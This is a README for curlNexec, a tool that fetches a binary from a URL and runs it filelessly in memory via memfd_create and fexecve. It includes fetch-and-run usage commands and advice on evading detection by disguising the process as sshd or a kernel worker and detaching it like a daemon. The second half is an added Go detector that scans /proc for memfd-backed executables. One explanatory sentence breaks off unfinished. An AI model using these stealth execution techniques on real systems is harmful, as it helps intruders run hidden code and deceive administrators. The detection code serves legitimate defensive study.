👋 Certainly useful, mainly for fun, roughly inspired by the 0x00 article.

curlNexec lets you execute a remote binary on a local machine in one step.

## Usage

- simple usage:
  `curlNexec <binary_raw_url>`
- execute the binary under a specified program name:
  `curlNexec -n /usr/sbin/sshd <binary_raw_url>`
- detach program execution from the tty:
  `setsid curlNexec [...]`
## Explanation

We want to execute the binary `writeNsleep`, located on a remote machine, locally. We first start a Python HTTP server on the remote machine. Locally we use curlNexec and impersonate the `/usr/sbin/sshd` name for the execution of the binary `writeNsleep` (for stealthiness & fun).

The remote binary file is stored locally using the `memfd_create` syscall, which stores it in an anonymous memory-backed file that is not mapped into the file system (i.e. you can't find it using

Then we execute it using the `fexecve` syscall (as it is currently not provided by the Go `syscall` library, we implement it ourselves). With `fexecve` we reference the program to run by a file descriptor instead of its full path.
## Other skills for stealthiness

Although not present on disk, the running program can still be detected, using the `ps` command for example.

1. Cover the tracks with a fake program name: `curlNexec --name <fake_name> <binary_raw_url>`. By default the name is `[kworker/u:0]`.
2. Detach from the tty to mimic the behaviour of a daemon process: `setsid curlNexec <binary_raw_url>`. WIP: call `setsid` from code.

You could still be detected with:

```
$ lsof | grep memfd
```
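The `lsof | grep memfd` check above works because, on Linux, a process started through `memfd_create` + `fexecve` has a `/proc/<pid>/exe` link that points at a target such as `/memfd:<name> (deleted)` rather than at a file on disk, whatever name `ps` shows for it. The following detector, an added example that is not part of curlNexec, walks a procfs tree and reports such processes; the `root` parameter is an assumption introduced so the scan can also run against a constructed directory tree instead of the real `/proc`.

```go
// Added example (not curlNexec code): flag processes whose executable is backed
// by an anonymous memfd rather than by a file on disk.
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strconv"
	"strings"
)

// Finding describes one process whose executable is not backed by a file on disk.
type Finding struct {
	PID  int
	Comm string // name from /proc/<pid>/comm, i.e. what ps displays (may be faked)
	Exe  string // target of the /proc/<pid>/exe symlink
}

// IsMemfdExe reports whether an exe link target indicates a memfd-backed executable.
// The kernel renders such targets as "/memfd:<name> (deleted)".
func IsMemfdExe(target string) bool {
	return strings.HasPrefix(target, "/memfd:")
}

// ScanProc walks root (normally "/proc") and returns every process whose exe link
// points at a memfd. root is a hypothetical parameter so the same logic can be
// exercised against a constructed tree.
func ScanProc(root string) ([]Finding, error) {
	entries, err := os.ReadDir(root)
	if err != nil {
		return nil, err
	}
	var findings []Finding
	for _, e := range entries {
		pid, err := strconv.Atoi(e.Name())
		if err != nil || !e.IsDir() {
			continue // not a <pid> directory (e.g. /proc/sys)
		}
		exe, err := os.Readlink(filepath.Join(root, e.Name(), "exe"))
		if err != nil {
			continue // kernel threads, or processes we lack permission to inspect
		}
		if !IsMemfdExe(exe) {
			continue
		}
		// The comm name is whatever the process chose to present, so report it
		// next to the real exe target to make spoofed names visible.
		comm, _ := os.ReadFile(filepath.Join(root, e.Name(), "comm"))
		findings = append(findings, Finding{
			PID:  pid,
			Comm: strings.TrimSpace(string(comm)),
			Exe:  exe,
		})
	}
	return findings, nil
}

func main() {
	findings, err := ScanProc("/proc")
	if err != nil {
		fmt.Fprintln(os.Stderr, "scan failed:", err)
		os.Exit(1)
	}
	for _, f := range findings {
		fmt.Printf("pid=%d comm=%q exe=%q\n", f.PID, f.Comm, f.Exe)
	}
}
```

Run it as root to see every process; an unprivileged run silently skips processes whose `exe` link it cannot read, so an empty result from a non-root scan is not conclusive.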